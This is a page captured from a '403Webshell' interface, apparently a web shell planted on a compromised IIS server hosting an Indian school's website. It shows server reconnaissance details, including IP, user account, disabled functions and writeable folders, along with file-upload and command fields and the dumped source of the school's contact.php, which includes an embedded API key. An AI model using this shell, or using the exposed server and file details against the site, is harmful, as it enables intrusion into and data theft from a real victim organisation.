403Webshell
Server IP : 199.79.63.27  /  Your IP : 216.73.216.250
Web Server : Microsoft-IIS/10.0
System : Windows NT MD-PLESK-WEB5 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_6698(lcitec7i) ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/INETPUB/VHOSTS/lcit.edu.in/lcitps.edu.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : D:/INETPUB/VHOSTS/lcit.edu.in/lcitps.edu.in/contact.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Include database connection
include 'db.php';

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $stmt = $conn->prepare("INSERT INTO contact_messages (name, email, subject, message) VALUES (?, ?, ?, ?)");
    $stmt->bind_param("ssss", $_POST['name'], $_POST['email'], $_POST['subject'], $_POST['msg']);

    if ($stmt->execute()) {
        echo "<script>alert('Message sent successfully!');</script>";
    } else {
        echo "Error: " . $stmt->error;
    }

    $stmt->close();
    $conn->close();
}
?>




<!doctype html>
<html class="no-js" lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>LCIT Public School</title>
	  <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
	<?php include 'alllinks.php';?>
	
	<style> 
		/* Contact Form Styling */
		.contact-form { 
			background: #e9e2e2; 
			padding: 30px; 
			border-radius: 8px; 
			box-shadow: 0 4px 15px rgba(0,0,0,0.1); 
		} 
		.custom-input, .custom-textarea {
			border: 2px solid #ccc; 
			border-radius: 6px; 
			padding: 10px; 
			transition: all 0.3s ease; 
		}
		.custom-input:focus, .custom-textarea:focus {
			border-color: #EEEEEE; 
			/* green highlight */
			box-shadow: 0 0 8px rgba(40,167,69,0.3); 
			outline: none; 
		}
		.custom-textarea { 
			min-height: 120px; 
			resize: vertical; } 
		.custom-btn { 
			background: #28a745;
			color: #fff; 
			font-weight: bold; 
			padding: 12px 30px; 
			border-radius: 6px; 
			border: none; 
			transition: background 0.3s ease; 
		} 
		.custom-btn:hover { 
			background: #218838; 
		}
		
		/* Contact Info Box */ 
		.cnt-info { background: #e9e2e2; 
			padding: 25px;
			border-radius: 8px;
			box-shadow: 0 4px 15px rgba(0,0,0,0.1); text-align: center;
		} 
		.cnt-info h4 {
			color: #05136e; 
			font-weight: bold;
			margin-bottom: 15px; 
		} 
		.cnt-info p {
			color: #555; 
			font-size: 15px; 
			line-height: 1.6; 
		} 
		.address { 
			list-style: none; 
			padding: 0; margin: 15px 0; 
		} 
		.address li {
			margin-bottom: 10px; 
			font-size: 15px;
			color: #333; } 
		.address i {
			color: #28a745; 			/* green for icons */ 
			margin-right: 8px;
		} 
		
		/* Social Icons */
		.social { 
			list-style: none; 
			padding: 0; display: flex; 
			justify-content: center;
			gap: 15px;
		} 
		.social li a {
			font-size: 20px; 
			color: #555; transition: all 0.3s ease;
		} 
		.social li a:hover { 
			color: #28a745; /* hover green */ 
			transform: scale(1.2); 
		}
	</style>
</head>

<body>
    <!--[if lt IE 8]>
            <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
    <!-- preloader area start -->
    <div id="preloader">
        <div class="loader"></div>
    </div>
    <!-- prealoader area end -->
    <!-- header area start -->
<?php include 'navbar.php';?>
    <!-- header area end -->
    <!-- offset search area start -->
    <div class="offset-search">
        <form action="#">
            <input type="text" name="search" placeholder="Sarch here...">
            <button type="submit"><i class="fa fa-search"></i></button>
        </form>
    </div>
    <!-- offset search area end -->
    <!-- body overlay area start -->
    <div class="body_overlay"></div>
    <!-- body overlay area end -->
    <!-- crumbs area start -->
    <div class="crumbs-area">
        <div class="container">
            <div class="crumb-content">
                <h4 class="crumb-title">Contact Us</h4>
            </div>
        </div>
    </div>
    <!-- crumbs area end -->
    <!-- contact info area start -->
<div class="container"> <br> <br>
	
    <div class="row">
        <!-- Contact Info -->
       <div class="col-lg-4"> 
		   <div class="cnt-info"> 
			   <h4>Contact Info</h4> <br>
			   <p> Near High Court, Raipur Road<br> Bodri, Bilaspur<br> Chhattisgarh, India<br> Pin: 495220 </p> 
			   <ul class="address">
				   <li><i class="fa fa-phone"></i> 9516606123, 9589000465</li>
				   <li><i class="fa fa-envelope"></i> lcitps@lcit.edu.in</li> 
			   </ul>
			   
			   <ul class="social list-inline mt-5"> 
				   <li><a href="https://www.facebook.com/lcitpsbilaspur" target="_blank"><i class="fa fa-facebook"></i></a></li>
				    <li> <a href="https://wa.me/9516900123" target="_blank"><i class="fa fa-whatsapp"></i> </a> </li>
							  
				   <li><a href="https://www.youtube.com/channel/UCUzX7CZmi3QuflnNTZkr3Ag" target="_blank"><i class="fa fa-youtube"></i></a></li> <li><a href="https://www.instagram.com/lcitpublicschool" target="_blank"><i class="fa fa-instagram"></i></a></li> 
				   
			   </ul>
		   </div> 
		   <br><br>
		   <div class="cnt-info"> 
			  
			   <h4>Parenting Helpline</h4> 
			    <ul class="address">
			    <li><i class="fa fa-phone"></i> 9516606123</li></ul>
			   
		   </div> 
		</div>
		 
	
        <!-- Contact Form -->
        <div class="col-lg-8">
               <div class="cnt-info"> 
                    <h4>Get in touch <span>with us</span></h4><br><br>
              
            
            <div class="contact-form"> <form method="post"> <div class="row"> <div class="col-md-4 mb-3"> <input type="text" name="name" class="form-control custom-input" placeholder="Enter your name" required> </div> <div class="col-md-4 mb-3"> <input type="email" name="email" class="form-control custom-input" placeholder="Your Email" required> </div> <div class="col-md-4 mb-3"> <input type="text" name="subject" class="form-control custom-input" placeholder="Subject" required> </div> <div class="col-12 mb-3"> <textarea name="msg" id="msg" class="form-control custom-textarea" placeholder="Your message here" required></textarea> </div> <div class="col-12 text-center"> <button type="submit" class="btn custom-btn">SEND TO US</button> </div> </div> </form> </div>
        </div>
    </div>
</div>
	</div><br>
<!-- contact info area end -->

<!-- contact form area start -->
<div class="contact-form-area">
    <iframe 
        src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3683.123456789!2d82.10162486!3d22.03112132!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3a28d123456789%3A0xabcdef123456789!2sLCIT%20Public%20School!5e0!3m2!1sen!2sin!4v1700000000000!5m2!1sen!2sin" 
        width="100%" 
        height="350" 
        style="border:0;" 
        allowfullscreen="" 
        loading="lazy" 
        referrerpolicy="no-referrer-when-downgrade">
    </iframe>
</div>


<!-- contact form area end -->


   <!-- footer area start -->
<?php include 'footer.php';?>
   <!-- footer area end -->


<!-- jquery latest version -->
<script src="assets/js/vendor/jquery-2.2.4.min.js"></script>
<!-- bootstrap 4 js -->
<script src="assets/js/bootstrap.min.js"></script>
<!-- others plugins -->
<script src="assets/js/owl.carousel.min.js"></script>
<script src="assets/js/jquery.magnific-popup.min.js"></script>
<script src="assets/js/jquery.slicknav.min.js"></script>
<script src="assets/js/plugins.js"></script>
<!-- google map -->

<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyDsUcTjt43mTheN9ruCsQVgBE-wgN6_AfY&#038"></script>
<script src="assets/js/google-maps.js"></script>
<script src="assets/js/scripts.js"></script>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit